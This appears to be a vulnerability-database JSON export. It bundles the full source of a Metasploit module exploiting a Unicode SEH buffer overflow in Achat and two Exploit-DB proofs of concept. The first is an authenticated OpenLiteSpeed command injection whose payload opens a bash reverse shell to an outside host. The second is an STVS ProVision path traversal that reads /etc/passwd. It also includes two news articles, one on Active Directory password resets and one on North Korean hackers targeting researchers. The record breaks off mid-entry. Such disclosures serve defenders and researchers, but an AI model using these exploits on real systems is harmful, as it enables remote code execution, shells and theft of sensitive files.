{"id": "MSF:EXPLOIT/WINDOWS/MISC/ACHAT_BOF", "type": "metasploit", "bulletinFamily": "exploit", "title": "Achat Unicode SEH Buffer Overflow", "description": "This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it's possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.\n", "published": "2015-02-09T23:39:55", "modified": "2020-10-02T20:00:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-10-07T23:12:27", "viewCount": 974, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2020-10-07T23:12:27", "rev": 2}, "dependencies": {"references": [{"type": "hackread", "idList": ["HACKREAD:61B84AA2CD189C7BF515824C6B675D55", "HACKREAD:BA8CB9ABA5BF95AD6613EB4A38481400"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C1EB97E448B0516D5F0DA6217F5EA920", "RAPID7BLOG:8C20D84F2EC2534C44799291EAD514A2"]}, {"type": "threatpost", "idList": ["THREATPOST:D94615CF5141CE7FB12230E1881E143D", "THREATPOST:EE13D5D6566D467347EEB1C981A428F9", "THREATPOST:B25B9343CBDFDF0A7721B6D1F920161F", "THREATPOST:E2E10B1216974B1D6453688F96E82370", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714"]}, {"type": "mssecure", "idList": ["MSSECURE:B42B640CBAB51E35DC07B81926B5F910"]}, {"type": "hp", "idList": ["HP:C06936516"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159484", "PACKETSTORM:159504"]}, {"type": "exploitdb", "idList": ["EDB-ID:48860", "EDB-ID:48858", "EDB-ID:48861"]}, {"type": "kitploit", "idList": ["KITPLOIT:6196584118367158327"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31B4D1B2F952EC799687B5891EE01EE6"]}, {"type": "cve", "idList": ["CVE-2020-5632"]}, {"type": "virtuozzo", "idList": ["VZA-2020-063"]}], "modified": "2020-10-07T23:12:27", "rev": 2}, "vulnersScore": 5.6}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/achat_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Achat Unicode SEH Buffer Overflow',\n 'Description' => %q{\n This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.\n },\n 'Author' =>\n [\n 'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery\n 'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module\n ],\n 'License'\t => MSF_LICENSE,\n 'References' =>\n [\n ['CWE', '121'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process'\n },\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 730,\n 'BadChars' => \"\\x00\" + (0x80..0xff).to_a.pack(\"C*\"),\n 'StackAdjustment' => -3500,\n 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'EAX'\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK Windows XP SP3, Windows 7\n # Not working on Windows Server 2003\n [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => \"\\x2A\\x46\" } ] #ppr from AChat.exe\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-12-18'))\n\n register_options(\n [\n Opt::RPORT(9256)\n ])\n end\n\n def exploit\n connect_udp\n\n # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding\n # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding\n # 55 PUSH EBP # ebp holds a close pointer to the payload\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 58 POP EAX # mov eax, ebp\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 05 00140011 ADD EAX,11001400 # adjusting eax\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 50 PUSH EAX # eax points to the start of the shellcode\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 58 POP EAX # padding\n # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding\n # 59 POP ECX # padding\n # 0039 ADD BYTE PTR DS:[ECX],BH # padding\n first_stage = \"\\x55\\x2A\\x55\\x6E\\x58\\x6E\\x05\\x14\\x11\\x6E\\x2D\\x13\\x11\\x6E\\x50\\x6E\\x58\\x43\\x59\\x39\"\n\n sploit = 'A0000000002#Main' + \"\\x00\" + 'Z' * 114688 + \"\\x00\" + \"A\" * 10 + \"\\x00\"\n sploit << 'A0000000002#Main' + \"\\x00\" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)\n sploit << \"\\x62\" + 'A' * 45 # 0x62 will be used to calculate the right offset\n sploit << \"\\x61\\x40\" # POPAD + INC EAX\n\n sploit << target.ret # AChat.exe p/p/r address\n\n # adjusting the first thread's unicode payload, tricky asm-fu\n # the first seh exception jumps here, first_stage variable will be executed\n # by the second seh exception as well. It needs to be in sync with the second\n # thread, so that is why we adjust eax/ebp to have a close pointer to the\n # payload, then first_stage variable will take the rest of the job.\n # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding\n # 55 PUSH EBP # ebp with close pointer to payload\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 58 POP EAX # put ebp to eax\n # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding\n # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place\n # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more\n # 05 00140011 ADD EAX,11001400 # more adjusting\n # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding\n # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100\n # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding\n # 50 PUSH EAX\t\t\t# saving eax\n # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding\n # 5D POP EBP\t\t\t# mov ebp, eax\n sploit << \"\\x43\\x55\\x6E\\x58\\x6E\\x2A\\x2A\\x05\\x14\\x11\\x43\\x2d\\x13\\x11\\x43\\x50\\x43\\x5D\" + 'C' * 9 + \"\\x60\\x43\"\n sploit << \"\\x61\\x43\" + target.ret # second nseh entry, for the second thread\n sploit << \"\\x2A\" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX\n sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload\n sploit << \"\\x00\" + 'A' * 10 + \"\\x00\"\n\n i = 0\n while i < sploit.length do\n if i > 172000\n Rex::sleep(1.0)\n end\n sent = udp_sock.put(sploit[i..i + 8192 - 1])\n i += sent\n end\n disconnect_udp\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"thn": [{"lastseen": "2021-01-27T10:31:16", "bulletinFamily": "info", "cvelist": [], "description": "[](<https://thehackernews.com/images/-Y0AsbgRoqno/YBE9rxppazI/AAAAAAAAAzA/rObUml3VRaEfoHAIzISKRNIjaYFvFPcjgCLcBGAsYHQ/s0/ad-password-reset.jpg>)\n\nCreating workflows around verifying password resets can be challenging for organizations, especially since many have shifted work due to the COVID-19 global pandemic.\n\nWith the numbers of cyberattacks against businesses exploding and compromised credentials often being the culprit, companies have to bolster security around resetting passwords on user accounts.\n\nHow can organizations bolster the security of password resets for remote workers? One security workflow might involve having manager approval before IT helpdesk technicians can change a remote worker's password. In this way, the user's manager is involved in the process.\n\nAdditionally, some organizations might opt to allow managers themselves the ability to change end-user passwords. How can this be configured in Active Directory? Also, is there a more seamless solution for requiring manager approval for password resets?\n\n## Why password reset security is critical\n\nThis past year has undoubtedly created many IT helpdesk staff challenges, including supporting a workforce containing mainly remote workers. One of the difficulties associated with remote employees is a security challenge surrounding password resets.\n\nCybercriminals are increasingly using identity attacks to compromise environments. It often provides the \"path of least resistance\" into an environment. If valid credentials are compromised, this is often the easiest means to attack and compromise business-critical data and systems.\n\nWith employees working remotely, IT helpdesk technicians supporting account unlock and password changes no longer have a face-to-face interaction with employees working \"inside\" the on-premises environment. \n\nOrganizations may be large enough that IT technicians may not personally know each employee who may be working remotely. It introduces the possibility of an attacker impersonating a legitimate employee and social engineering helpdesk staff to reset a legitimate account password.\n\nAdditionally, a compromised end-user client device can lead to illegitimate password resets of end-user accounts.\n\nRecognizing new identity threats facing organizations today, IT admins may want to get managerial approval for employee account password resets. This task may even be delegated to managers of end-users working in their departments. How can password resets by department managers quickly be configured using built-in features in Active Directory?\n\n## Delegating password reset permissions in Active Directory\n\nMicrosoft Active Directory contains a feature that allows _delegating_ permissions to certain users or groups to carry out very granular tasks. These tasks include **password resets**. To configure delegation of password reset permissions, you can following the process below.\n\n[](<https://thehackernews.com/images/-dNpPBozkcGw/YBE7-xBf6lI/AAAAAAAAAy0/5HwKFM_Ty8oRwYCSKT9f1bVQbdYO1guigCLcBGAsYHQ/s0/password-reset-5.jpg>) \n--- \nBeginning to configure the Delegate Control options in Active Directory \n \nIt launches the **Delegation of Control Wizard**, which first allows choosing a user or group you want to assign permissions. Here you click **Add\u2026** to add a user or group. We have already added the group shown below \u2013 **DLGRP_PasswordReset,** a domain local group created in Active Directory. As a best practice, it is always better to use groups for managing permissions delegation. It allows quickly and easily adding or removing specific users without having to go through the permissions delegation wizard each time. \n\n[](<https://thehackernews.com/images/-Eh8l42Or770/YBE7rA3rYHI/AAAAAAAAAys/_RpdlOIkeygUYc1wZcrTUJ3qKRcNvHWdwCLcBGAsYHQ/s0/password-reset-4.jpg>) \n--- \nChoose the users and groups who will assume the permissions \n \nOn the **Tasks to Delegate** screen, under **Delegate the following common tasks**, choose **Reset user passwords and force password change at the next logon** option**. **Click **Next**.\n\n[](<https://thehackernews.com/images/-RgRlyD0w9wg/YBE6uBhShXI/AAAAAAAAAyg/zQcu8GmxPtE1STZfW0Efa6jnI_upwy7-wCLcBGAsYHQ/s0/password-reset-3.jpg>) \n--- \nChoosing the Reset user passwords and force password change at next logon option \n \nFinish out the delegation of control wizard.\n\n[](<https://thehackernews.com/images/-OxIj93vw9HM/YBE5hVKPH6I/AAAAAAAAAyU/voqb4abBcOcFZUXXdt1E2NV5RIY8C3O_ACLcBGAsYHQ/s0/password-reset-2.jpg>) \n--- \nComplete the Delegation of Control Wizard \n \n## Assigning managers to reset passwords\n\nUsing the process shown above, administrators can add managers to the group delegated the reset passwords permission. It allows pointing to a specific user or group for delegating permissions to reset passwords.\n\nAs mentioned, it is always best practice when creating a permissions delegation in Active Directory to assign this to a group, even if you are delegating permissions to one user. Doing it this way makes the lifecycle management of the permissions delegation much more manageable.\n\nHowever, the Active Directory group resource is fairly static in this context. Outside of Microsoft Exchange Server and _dynamic distribution groups_, Active Directory does not have a native way built-in to create _dynamic_ _security groups_ that are populated based on Active Directory attributes.\n\nIs there a way to have _dynamic security groups_ in Active Directory by using a scripted approach? Yes, there is. Using PowerShell and the **get-aduser** cmdlet and a few other Active Directory related PowerShell cmdlets, you can effectively query Active Directory for users containing specific characteristics and then add or remove those users from specific groups.\n\nYou can create custom PowerShell scripts to accomplish this. However, a couple of resources can quickly get you up to speed with a customized PowerShell script to adding and removing users from security groups based on user location, attributes, and other features.\n\nLet's think about a use case related to managerial approval for password resets. Suppose you wanted to grant managers the permissions to reset passwords. In that case, you could do some PowerShell scripting in conjunction with the delegation wizard and have an automated process to add and remove managers from Active Directory into a group configured for password resets.\n\nNotice the following PowerShell resources for this:\n\n * [ShadowGroupSync - Github](<https://github.com/davegreen/shadowGroupSync>)\n * [Windows OSHub dynamic security group example](<https://woshub.com/active-directory-dynamic-user-groups-powershell/>)\n\nBelow is an example based on the [Windows OSHub code](<https://pastebin.com/YxuMU6vc>) of how you could use PowerShell and search for \"Manager\" in the **title** attribute.\n\n[](<https://thehackernews.com/images/-F48ZwiqZJKY/YBE_MjU7ynI/AAAAAAAA3j4/wajQaGZLCT8Mx0iqSAkc68nPZ1v6eyEAACLcBGAsYHQ/s728/CODE.jpg>)\n\n \n\n\n \n\n\nYou could schedule the above PowerShell script to run at scheduled intervals with a scheduled task to add or remove users from the group delegated password reset permissions dynamically.\n\n## Specops uReset \u2013 A better approach to password reset manager approvals\n\nSpecops Software provides a much better automated approach to enable manager approval for password resets. Specops uReset is a fully-featured [self-service password reset (SSPR) solution](<https://specopssoft.com/product/specops-password-reset/?utm_source=The%20Hacker%20News&utm_medium=Referral&utm_campaign=The%20Hacker%20News%20uReset%20promo%202021>) that allows end-users to reset their passwords securely.\n\nAlso, with Specops uReset, you can add the ability for **Manager Identification**. When a user authenticates with Manager Identification, the authentication request sends to their manager in the form of a text message or email communication. The manager of the user must then confirm the user's identity for approving the password reset request.\n\nIt dramatically enhances the security of password reset functionality since two people are involved. It also helps to provide a change control workflow for [password reset requests and an audit trail](<https://specopssoft.com/blog/audit-password-changes-active-directory/?utm_source=The%20Hacker%20News&utm_medium=Referral&utm_campaign=The%20Hacker%20News%20uReset%20promo%202021>). \n\nThere are two requirements needed by Specops to use the manager approval:\n\n * Each user account must **have a manager assigned to them in Active Directory**.\n * Each manager account must have an email address/mobile phone number associated with their account in Active Directory, to be able to receive authentication requests from users.\n\nTo assign a manager using PowerShell to all the Active Directory group members, you can use the following Powershell code.\n\n> _get-aduser -filter \"department -eq 'Accounting' -AND samaccountname | set-aduser -manager jdoe _\n\nIn the Specops uReset administration **Identity Services** configuration, you can configure **Manager Identification**. You can select between email and text notifications.\n\n[](<https://thehackernews.com/images/-zOOjzDps-Pk/YBE2xNOMVmI/AAAAAAAAAyI/30jUg_7GtuYly9xlDtBTm8LcyaCduhZOQCLcBGAsYHQ/s0/password-reset-1.jpg>) \n--- \nConfiguring Manager Identification in Specops uReset \n \n## Wrapping Up\n\nSecuring password resets is a critical area of security organizations need to address for securing remote end-user accounts. While you can use a scripted PowerShell approach to create dynamic Active Directory security groups, it can be problematic to maintain and doesn't scale very well. \n\nSpecops uReset provides an easy way to implement self-service password resets (SSPR) with additional security checks such as manager approval. Using Specops uReset, businesses can easily require managers to approve password reset requests for end-users.\n\nLearn more about [Specops uReset self-service password resets](<https://specopssoft.com/product/specops-password-reset/?utm_source=The%20Hacker%20News&utm_medium=Referral&utm_campaign=The%20Hacker%20News%20uReset%20promo%202021>) with manager approval features.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-27T10:25:16", "published": "2021-01-27T10:18:00", "id": "THN:482B0E28A93CA3B3365D5F373D6F43F7", "href": "https://thehackernews.com/2021/01/using-manager-attribute-in-active.html", "type": "thn", "title": "Using the Manager Attribute in Active Directory (AD) for Password Resets", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-27T04:28:55", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "[](<https://thehackernews.com/images/-iuZmw75wd8g/YA-j-PbeyrI/AAAAAAAABlE/RgTbZC607W00K50gmsHyQ2wxzElQjkCMwCLcBGAsYHQ/s0/north-korean-hackers.jpg>)\n\nGoogle on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.\n\nThe internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.\n\nThe goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\n\"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers,\" [said](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) TAG researcher Adam Weidemann.\n\nThe attackers created as many as 10 fake Twitter personas and five LinkedIn profiles, which they used to engage with the researchers, share videos of exploits, retweet other attacker-controlled accounts, and share links to their purported research blog.\n\nIn one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw ([CVE-2021-1647](<https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html>)), when in reality, the exploit turned out to be fake.\n\n[](<https://thehackernews.com/images/-z357EvP7xhQ/YA-h_c5mACI/AAAAAAAABk4/Rfunq4GEsRYSpfML7a1rW1uzau-Y92QCQCLcBGAsYHQ/s0/twitter.jpg>)\n\nThe North Korean hackers are also said to have used a \"novel social engineering method\" to hit security researchers by asking them if they would like to collaborate on vulnerability research together and then provide the targeted individual with a Visual Studio Project.\n\nThis Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.\n\nKaspersky researcher Costin Raiu, in a [tweet](<https://twitter.com/craiu/status/1353964086455902208>), noted the malware delivered via the project shared code-level similarities with [Manuscrypt](<https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer>) (aka FAILCHILL or Volgmer), a previously known Windows backdoor deployed by the Lazarus Group.\n\nWhat's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 server.\n\n[](<https://thehackernews.com/images/-5WNEGS3rJFg/YA-ht9CNs1I/AAAAAAAABkw/Q6gouDrb7eg3yZSUK7zlsoHZh-S_1heVACLcBGAsYHQ/s0/security-reseachers.jpg>)\n\nWith the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.\n\n\"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,\" Weidemann said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-27T04:27:18", "published": "2021-01-26T05:10:00", "id": "THN:970890B8E519A3BC5427798160F5F09C", "href": "https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html", "type": "thn", "title": "N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2021-01-27T09:25:03", "description": "", "published": "2021-01-27T00:00:00", "type": "exploitdb", "title": "Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-27T00:00:00", "id": "EDB-ID:49483", "href": "https://www.exploit-db.com/exploits/49483", "sourceData": "# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)\r\n# Date: 26/1/2021\r\n# Exploit Author: cmOs - SunCSR\r\n# Vendor Homepage: https://openlitespeed.org/\r\n# Software Link: https://openlitespeed.org/kb/install-from-binary/\r\n# Version: 1.7.8\r\n# Tested on Windows 10\r\n\r\n\r\nStep 1: Log in to the dashboard using the Administrator account.\r\nStep 2 : Access Server Configuration > External App > Command\r\nStep 3: Set \"Start By Server *\" Value to \"Yes (Through CGI Daemon)\r\nStep 4 : Inject payload \"fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'\" to \"Command\" value\r\nStep 5: Graceful Restart\r\n\r\n[POC]\r\n\r\nPOST /view/confMgr.php HTTP/1.1\r\nHost: target:7080\r\nConnection: close\r\nContent-Length: 579\r\nAccept: text/html, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nOrigin: https://target:7080\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: https://target:7080/index.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;\r\nlitespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;\r\nLSPA37FE0C43B84483E0=excYiZbpUS4%3D\r\n\r\nname=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49483"}, {"lastseen": "2021-01-27T09:25:03", "description": "", "published": "2021-01-27T00:00:00", "type": "exploitdb", "title": "STVS ProVision 5.9.10 - File Disclosure (Authenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-27T00:00:00", "id": "EDB-ID:49481", "href": "https://www.exploit-db.com/exploits/49481", "sourceData": "# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)\r\n# Date: 19.01.2021\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: http://www.stvs.ch\r\n\r\n\r\nSTVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability\r\n\r\n\r\nVendor: STVS SA\r\nProduct web page: http://www.stvs.ch\r\nPlatform: Ruby\r\nAffected version: 5.9.10 (build 2885-3a8219a)\r\n 5.9.9 (build 2882-7c3b787)\r\n 5.9.7 (build 2871-a450938)\r\n 5.9.1 (build 2771-1bbed11)\r\n 5.9.0 (build 2701-6123026)\r\n 5.8.6 (build 2557-84726f7)\r\n 5.7\r\n 5.6\r\n 5.5\r\n\r\nSummary: STVS is a Swiss company specializing in development of\r\nsoftware for digital video recording for surveillance cameras\r\nas well as the establishment of powerful and user-friendly IP\r\nvideo surveillance networks.\r\n\r\nDesc: The NVR software ProVision suffers from an authenticated\r\narbitrary file disclosure vulnerability. Input passed through\r\nthe files parameter in archive download script (archive.rb) is\r\nnot properly verified before being used to download files. This\r\ncan be exploited to disclose the contents of arbitrary and sensitive\r\nfiles.\r\n\r\nTested on: Ubuntu 14.04.3\r\n nginx/1.12.1\r\n nginx/1.4.6\r\n nginx/1.1.19\r\n nginx/0.7.65\r\n nginx/0.3.61\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5623\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php\r\n\r\n19.01.2021\r\n\r\n--\r\n\r\n\r\n#1 LFI Prober (FP):\r\n-------------------\r\n\r\nGET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\r\nHost: 192.168.1.17\r\nAuthorization: Digest username=\"admin\", realm=\"ProVision\", nonce=\"MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz\", uri=\"/archive/download\", algorithm=MD5, response=\"aceffbb0a121570f98a9f4678470a588\", opaque=\"3c837ec895bd5fedcdad8674184de82e\", qop=auth, nc=000001ca, cnonce=\"ebed759486b87a80\"\r\nAccept: application/json, text/javascript, */*\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nOrigin: http://192.168.1.17\r\nReferer: http://192.168.1.17/archive\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: last_stream=1; __flash__info=\r\nConnection: close\r\n\r\nHTTP/1.1 500 Not Found\r\nServer: nginx/1.4.6 (Ubuntu)\r\nDate: Mon, 18 Jan 2021 23:23:30 GMT\r\nContent-Type: text/html\r\nContent-Length: 2727\r\nConnection: close\r\n\r\n<h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul>\r\n\r\n\r\n#2 LFI Prober (Verified):\r\n-------------------------\r\n\r\n$ curl 